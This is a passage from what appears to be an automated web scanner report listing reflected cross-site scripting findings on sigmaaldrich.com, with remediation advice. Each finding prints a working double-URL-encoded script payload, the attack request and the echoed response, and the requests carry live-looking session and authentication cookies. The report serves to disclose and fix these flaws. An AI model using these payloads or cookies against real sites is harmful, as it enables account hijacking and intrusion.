Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:46 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc694f6";alert(1)//3ccebd517b4/medialib/labware/labware-icons/cell-culture","E404") ;
   </script>
...[SNIP]...

1.349. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/cell-culture [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/cell-culture

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa3b1%2522%253balert%25281%2529%252f%252fb095cfc68d was submitted in the REST URL parameter 2. This input was echoed as fa3b1";alert(1)//b095cfc68d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialibfa3b1%2522%253balert%25281%2529%252f%252fb095cfc68d/labware/labware-icons/cell-culture HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:48 GMT
Content-Length: 28950
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialibfa3b1";alert(1)//b095cfc68d/labware/labware-icons/cell-culture","E404") ;
   </script>
...[SNIP]...

1.350. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/cell-culture [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/cell-culture

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ade4%2522%253balert%25281%2529%252f%252f9e3f364d8a5 was submitted in the REST URL parameter 3. This input was echoed as 6ade4";alert(1)//9e3f364d8a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware6ade4%2522%253balert%25281%2529%252f%252f9e3f364d8a5/labware-icons/cell-culture HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:49 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware6ade4";alert(1)//9e3f364d8a5/labware-icons/cell-culture","E404") ;
   </script>
...[SNIP]...

1.351. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/cell-culture [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/cell-culture

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e91f%2522%253balert%25281%2529%252f%252f9ee11522f95 was submitted in the REST URL parameter 4. This input was echoed as 4e91f";alert(1)//9ee11522f95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons4e91f%2522%253balert%25281%2529%252f%252f9ee11522f95/cell-culture HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:51 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons4e91f";alert(1)//9ee11522f95/cell-culture","E404") ;
   </script>
...[SNIP]...

1.352. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/cell-culture [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/cell-culture

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11622%2522%253balert%25281%2529%252f%252fd1ea5e37e15 was submitted in the REST URL parameter 5. This input was echoed as 11622";alert(1)//d1ea5e37e15 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons/cell-culture11622%2522%253balert%25281%2529%252f%252fd1ea5e37e15 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:53 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons/cell-culture11622";alert(1)//d1ea5e37e15","E404") ;
   </script>
...[SNIP]...

1.353. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/centrifugation [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/centrifugation

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload adc0e%2522%253balert%25281%2529%252f%252f1839ef392e4 was submitted in the REST URL parameter 1. This input was echoed as adc0e";alert(1)//1839ef392e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etcadc0e%2522%253balert%25281%2529%252f%252f1839ef392e4/medialib/labware/labware-icons/centrifugation HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
